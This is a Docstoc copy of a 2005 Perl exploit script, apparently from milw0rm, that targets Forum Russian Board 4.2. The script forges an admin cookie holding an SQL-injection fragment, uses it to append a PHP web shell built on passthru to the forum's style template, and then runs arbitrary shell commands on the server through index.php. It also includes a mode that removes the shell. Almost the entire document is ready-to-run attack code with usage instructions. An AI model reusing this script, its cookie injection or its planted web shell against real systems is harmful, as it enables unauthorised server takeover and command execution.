Forum Russian Board 4.2 Full Command Execution Exploit

Document Sample
Forum Russian Board 4.2 Full Command Execution Exploit Powered By Docstoc
					                           Forum Russian Board 4.2 Full Command Execution Exploit                                      Page 1/3
  1    #!/usr/bin/perl
  2
  3    #   Forum Russian Board 4.2 Full (FRB) (http://www.carline.ru , http://frb.ru)
  4    #   command execution exploit by RST/GHC (http://rst.void.ru , http://ghc.ru)
  5    #   bugs found by foster & 1dt.w0lf , xpl coded by 1dt.w0lf
  6    #   RST/GHC − http://rst.void.ru , http://ghc.ru
  7
  8    use IO::Socket;
  9    use Getopt::Std;
  10
  11   getopts("h:p:u:i:c:");
  12
  13   $host   =   $opt_h;
  14   $path   =   $opt_p;
  15   $user   =   $opt_u;
  16   $id     =   $opt_i;
  17   $cmd    =   $opt_c || ’create’;
  18
  19   $cmdspl = "%26%26"; # ;      − for unix
  20                       # %26%26 − for windows
  21
  22   if(!$host || !$path) { usage(); }
  23   if(($cmd eq ’create’ || $cmd eq ’delete’) && (!$user || !$id)) { usage(); }
  24
  25   $host =~ s/(http:\/\/)//g;
  26   $cook = $user."’ /*";
  27
  28   if($cmd eq ’create’ || $cmd eq ’delete’){
  29   head();
  30   print ">>> CREATE SHELL\n" if ($cmd eq ’create’);
  31   print ">>> DELETE SHELL\n" if ($cmd eq ’delete’);
  32   $sock = IO::Socket::INET−>new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[−] CONNECT FAILED\n";
  33   print $sock "GET ${path}admin/style_edit.php HTTP/1.1\n";
  34   print $sock "Host: $host\n";
  35   print $sock "Accept: */*\n";
  36   print $sock "Cookie: board_user_cook=$cook;board_user_id=$id\n";
  37   print $sock "Connection: close\n\n";
  38   print "GETTING CURRENT STYLE ... [";
  39   while ($res = <$sock>)
  40   {
  41     if($res =~ /(.*)<\/textarea>/) { $data .= $1; $p = 0; }
  42     $data .= $res if $p;
  43     if($res =~ s/(.*)(<textarea)([^<>]*)([>])(.*)/$5/) { $data .= $res; $p = 1; }
  44   }
  45
  46   if(length($data)>0) { print " DONE ]\n"; }
  47   else { print " FAILED ]\n"; exit(); }
  48
  49   if($data =~ /rst_ghc/)
  50    {
  51    if($cmd eq ’create’) { print "SHELL ALREADY EXIST!"; exit(); }
  52    if($cmd eq ’delete’)
RusH                                                                                                                   06/21/2005
                         Forum Russian Board 4.2 Full Command Execution Exploit                                         Page 2/3
  53      {
  54      print "SHELL EXIST.\nDELETING SHELL.\n";
  55      $data =~ s/\s*<\? if\(\$_GET\[rst_ghc\]\)\{ passthru\(\$_GET\[rst_ghc\]\); \} \?>//g;
  56      }
  57    }
  58   else
  59    {
  60    if($cmd eq ’create’)
  61      {
  62      $data .= "\n";
  63      $data .= ’<? if($_GET[rst_ghc]){ passthru($_GET[rst_ghc]); } ?>’;
  64     }
  65    if($cmd eq ’delete’) { print "SHELL NOT EXIST. CAN’T DELETE."; exit(); }
  66    }
  67
  68   $data =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
  69   $post = "message=${data}&form_h=yes&style_edit_ok=%C8%E7%EC%E5%ED%E8%F2%FC";
  70   print "CREATE NEW STYLE ...[";
  71   $sock = IO::Socket::INET−>new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[−] CONNECT FAILED\r\n";
  72   print $sock "POST ${path}admin/style_edit.php HTTP/1.1\n";
  73   print $sock "Host: $host\n";
  74   print $sock "Cookie: board_user_cook=$cook;board_user_id=$id\n";
  75   print $sock "Content−Type: application/x−www−form−urlencoded\n";
  76   print $sock "Content−length: ".length($post)."\n\n";
  77   print $sock "$post";
  78   print $sock "\n\n";
  79   print " DONE ]\n";
  80   if($cmd eq ’create’) { print "SHELL CREATED SUCCESSFULLY! NOW YOU CAN TRY EXECUTE COMMAND."; }
  81   if($cmd eq ’delete’) { print "SHELL DELETED!"; }
  82   }
  83   else
  84   {
  85   head();
  86   print ">>> COMMAND EXECUTE\n";
  87   $sock = IO::Socket::INET−>new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[−] CONNECT FAILED\n";
  88   print $sock "GET ${path}index.php?rst_ghc=echo%20_START_%20$cmdspl%20$cmd%20$cmdspl%20echo%20_END_%20; HTTP/1.1\n";
  89   print $sock "Host: $host\n";
  90   print $sock "Accept: */*\n";
  91   print $sock "Connection: close\n\n";
  92
  93   while ($res = <$sock>)
  94   {
  95     if($res =~ /^_END_/) { $p = 0; }
  96     $data .= $res if $p;
  97     if($res =~ /^_START_/) { $p = 1; }
  98   }
  99   if(length($data)>0) {
 100                          print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 101                          print $data;
 102                          print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 103                          exit(0);
 104                        }
RusH                                                                                                                    06/21/2005
                            Forum Russian Board 4.2 Full Command Execution Exploit      Page 3/3
 105   else { print "[−] FAILED\nMaybe you forget create shell first?\n"; exit(0); }
 106
 107   }
 108
 109   sub usage()
 110   {
 111     head();
 112     print " USAGE : r57frb.pl [options]\n\n";
 113     print " Options: \n";
 114     print "      −h − host e.g. ’127.0.0.1’ , ’www.frb.ru’\n";
 115     print "      −p − path to forum e.g. ’/frb/’ , ’/forum/’\n";
 116     print "      −u − admin username e.g. ’admin’\n";
 117     print "      −i − admin id e.g. ’1’\n";
 118     print "      −c [create|delete|cmd]\n";
 119     print "         create − for create shell\n";
 120     print "         delete − for delete shell\n";
 121     print "         cmd − any command for execute\n";
 122     print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 123   exit(0);
 124   }
 125
 126   sub head()
 127   {
 128     print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 129     print "Forum Russian Board 4.0 Full command execution exploit by RST/GHC\n";
 130     print "−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
 131   }
 132
 133   # milw0rm.com [2005−06−21]




RusH                                                                                    06/21/2005